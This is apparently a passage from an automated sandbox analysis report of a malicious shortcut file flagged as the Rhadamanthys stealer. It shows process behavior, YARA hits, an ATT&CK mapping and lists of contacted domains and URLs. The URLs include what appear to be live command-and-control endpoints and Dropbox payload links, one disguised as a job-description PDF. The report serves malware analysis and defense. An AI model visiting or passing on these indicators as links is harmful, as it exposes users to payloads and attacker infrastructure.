                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exeCode function: 32_2_0046A3FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,32_2_0046A3FC
                    Source: C:\Windows\SysWOW64\fontdrvhost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000022.00000003.2765653273.0000000003420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000003.2759520208.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.2879586612.0000000003430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.2772213899.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Remote Access Functionality

                    barindex
                    Yara detected RHADAMANTHYS Stealer
                    Source: Yara matchFile source: 00000022.00000003.2765653273.0000000003420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000003.2759520208.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000022.00000002.2879586612.0000000003430000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.2772213899.0000000002AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information1
                    Scripting                    		Valid Accounts1
                    Command and Scripting Interpreter                    		1
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		21
                    Input Capture                    		1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		3
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts2
                    Service Execution                    		1
                    DLL Side-Loading                    		3
                    Windows Service                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory1
                    File and Directory Discovery                    		Remote Desktop Protocol21
                    Input Capture                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell                    		3
                    Windows Service                    		211
                    Process Injection                    		4
                    Obfuscated Files or Information                    		Security Account Manager133
                    System Information Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Registry Run Keys / Startup Folder                    		1
                    Registry Run Keys / Startup Folder                    		11
                    Software Packing                    		NTDS221
                    Security Software Discovery                    		Distributed Component Object ModelInput Capture4
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets31
                    Virtualization/Sandbox Evasion                    		SSHKeylogging115
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                    Masquerading                    		Cached Domain Credentials12
                    Process Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                    Virtualization/Sandbox Evasion                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578255 Sample: QhR8Zp6fZs.lnk Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 81 ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com 2->81 83 ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com 2->83 85 7 other IPs or domains 2->85 109 Suricata IDS alerts for network traffic 2->109 111 Found malware configuration 2->111 113 Windows shortcut file (LNK) starts blacklisted processes 2->113 115 9 other signatures 2->115 14 cmd.exe 1 2->14         started        17 msedge.exe 113 416 2->17         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 129 Windows shortcut file (LNK) starts blacklisted processes 14->129 131 Suspicious powershell command line found 14->131 133 PowerShell case anomaly found 14->133 22 powershell.exe 14 28 14->22         started        27 conhost.exe 1 14->27         started        75 192.168.2.6, 2845, 443, 49701 unknown unknown 17->75 77 239.255.255.250 unknown Reserved 17->77 135 Maps a DLL or memory area into another process 17->135 29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        35 5 other processes 17->35 79 127.0.0.1 unknown unknown 20->79 signatures6 process7 dnsIp8 87 23glcrtmzxqgwfpq3oujitt.ngrok.pizza 3.124.142.205, 443, 49714, 49874 AMAZON-02US United States 22->87 89 edge-block-www-env.dropbox-dns.com 162.125.69.15, 443, 49736, 49759 DROPBOXUS United States 22->89 91 www-env.dropbox-dns.com 162.125.69.18, 443, 49724, 49749 DROPBOXUS United States 22->91 71 C:\Users\user\AppData\Local\...\749209598.bat, DOS 22->71 dropped 121 Windows shortcut file (LNK) starts blacklisted processes 22->121 123 Loading BitLocker PowerShell Module 22->123 125 Powershell drops PE file 22->125 37 cmd.exe 22->37         started        40 msedge.exe 10 22->40         started        93 ucdccc1744965d58711471073024.dl.dropboxusercontent.com 29->93 95 googlehosted.l.googleusercontent.com 142.250.181.65, 443, 49777 GOOGLEUS United States 29->95 97 9 other IPs or domains 29->97 file9 signatures10 process11 signatures12 117 Windows shortcut file (LNK) starts blacklisted processes 37->117 119 Suspicious powershell command line found 37->119 42 powershell.exe 37->42         started        45 conhost.exe 37->45         started        47 msedge.exe 40->47         started        process13 file14 73 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe, PE32 42->73 dropped 49 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe 42->49         started        53 msedge.exe 42->53         started        process15 file16 69 C:\Users\user\Documents\...\PerfectoUna.exe, PE32 49->69 dropped 101 Detected unpacking (creates a PE file in dynamic memory) 49->101 103 Drops PE files to the document folder of the user 49->103 105 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->105 107 3 other signatures 49->107 55 148337f5-05f1-4aaa-b5bc-69ff3b8bcafe.exe 49->55         started        57 msedge.exe 53->57         started        signatures17 process18 process19 59 fontdrvhost.exe 55->59         started        63 WerFault.exe 55->63         started        dnsIp20 99 104.161.43.18, 2845, 49931 IOFLOODUS United States 59->99 127 Switches to a custom stack to bypass stack traces 59->127 65 fontdrvhost.exe 59->65         started        signatures21 process22 process23 67 WerFault.exe 65->67         started       

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    QhR8Zp6fZs.lnk29%VirustotalBrowse
                    QhR8Zp6fZs.lnk16%ReversingLabsShortcut.Trojan.Pantera
                    QhR8Zp6fZs.lnk100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com/cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=10%Avira URL Cloudsafe
                    https://ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com/cd/0/get/CgjThj9J4LYCxQ4m9781PB-i6DM80%Avira URL Cloudsafe
                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6e0%Avira URL Cloudsafe
                    http://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://23glcrtmzxqgwfpq3oujitt.n0%Avira URL Cloudsafe
                    https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e-UseBasicPars0%Avira URL Cloudsafe
                    https://ucdccc1744965d58711471073024.dl.dropboxusercontent.com/cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=10%Avira URL Cloudsafe
                    https://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com/cd/0/get/CggZQ6MA92jkJFVNQulAFQPZ1Z-P0%Avira URL Cloudsafe
                    https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfop0%Avira URL Cloudsafe
                    http://uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    http://ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com0%Avira URL Cloudsafe
                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza0%Avira URL Cloudsafe
                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e0%Avira URL Cloudsafe
                    https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfopx0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    fg.microsoft.map.fastly.net
                    		199.232.210.172
                    		truefalse
                      		high
                      bg.microsoft.map.fastly.net
                      		199.232.214.172
                      		truefalse
                        		high
                        chrome.cloudflare-dns.com
                        		162.159.61.3
                        		truefalse
                          		high
                          edge-block-www-env.dropbox-dns.com
                          		162.125.69.15
                          		truefalse
                            		high
                            www-env.dropbox-dns.com
                            		162.125.69.18
                            		truefalse
                              		high
                              ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                              		94.245.104.56
                              		truefalse
                                		high
                                googlehosted.l.googleusercontent.com
                                		142.250.181.65
                                		truefalse
                                  		high
                                  23glcrtmzxqgwfpq3oujitt.ngrok.pizza
                                  		3.124.142.205
                                  		truetrue
                                    		unknown
                                    clients2.googleusercontent.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      bzib.nelreports.net
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ucdccc1744965d58711471073024.dl.dropboxusercontent.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          ucf22feba25dd3a3196337a0818f.dl.dropboxusercontent.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              uccb79179262a53ec7922db7f8b0.dl.dropboxusercontent.com
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.dropbox.com
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  ucdd9b13509f51c836fc413bce70.dl.dropboxusercontent.com
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://ucff4ea26bff00b5ef56c95e397d.dl.dropboxusercontent.com/cd/0/get/Cghw7odouuVP5zAFfdnS8mkYkdEcHxcxeRVfOOLHoaVzf8CCxx4FYRE2toSmBIUSkAZ2VdW2HdPvLFiAkDwPdmC_5HYDIqN6fsWKpMoxUyzniDcSiXrh2CW-ZKL7s-PQM-0M0tkKwAILRH3xN_ZhESsc/file?dl=1false
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/metadata/921edf0e40341466669afb0baebb3d6etrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://tse1.mm.bing.net/th?id=OADD2.10239340418568_12QU0TF0Q0S6KJNUT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                      		high
                                                      https://tse1.mm.bing.net/th?id=OADD2.10239381963596_1EZBDO21TSG77E89L&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                        		high
                                                        https://tse1.mm.bing.net/th?id=OADD2.10239340418578_1AMTWIX1RFG5EZ1V6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                          		high
                                                          https://tse1.mm.bing.net/th?id=OADD2.10239340418567_1CP2YH6ACBDMHMMFR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                            		high
                                                            https://ucdccc1744965d58711471073024.dl.dropboxusercontent.com/cd/0/get/CgigYwzyq_gTs7gdIfDnmMAEanh123xyN-mpYu5zpIsZ6oepFNCBt4UT3cO-fSV6JmRJFyvYfC7vC78d3D9pMbbdUbCSQbpG6NWyiCZaiF8STtQdUi1fKa2xrP_aT5dupnmUVOfBLFnwetufinSGQQ-e/file?dl=1false
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://104.161.43.18:2845/7e56fc199c7194d0/g5rgxmg9.bkfoptrue
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://tse1.mm.bing.net/th?id=OADD2.10239340418577_1YCPJO6YBYEE06VWA&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                              		high
                                                              https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                                		high
                                                                https://www.dropbox.com/scl/fi/zlv5288pid16pw3i15rdx/Documents-about-company-information-and-job-descriptions-4.pdf?rlkey=e9yfqlf53smb0p94lfg3trrkx&dl=1false
                                                                  		high
                                                                  https://tse1.mm.bing.net/th?id=OADD2.10239381963595_1GOKBHWMF64DQK79Y&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                                                    		high
                                                                    https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6etrue
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.dropbox.com/scl/fi/wwnpbujiyqqrqopwkxcyc/secure.txt?rlkey=x8uqd3ph21yp3dt3mo8o3rpnd&dl=1false
                                                                      		high

                                                                      URLs from Memory and Binaries

                                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                                      https://23glcrtmzxqgwfpq3oujitt.ngrok.pizza/api/secure/921edf0e40341466669afb0baebb3d6e-UseBasicParspowershell.exe, 00000003.00000002.2470223495.000002E15CFB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2435573515.000002E1431C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2433719977.000002E142F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2476775542.000002E15D517000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2435817848.000002E143200000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2433719977.000002E142F62000.00000004.00000020.00020000.00000000.sdmpfalse
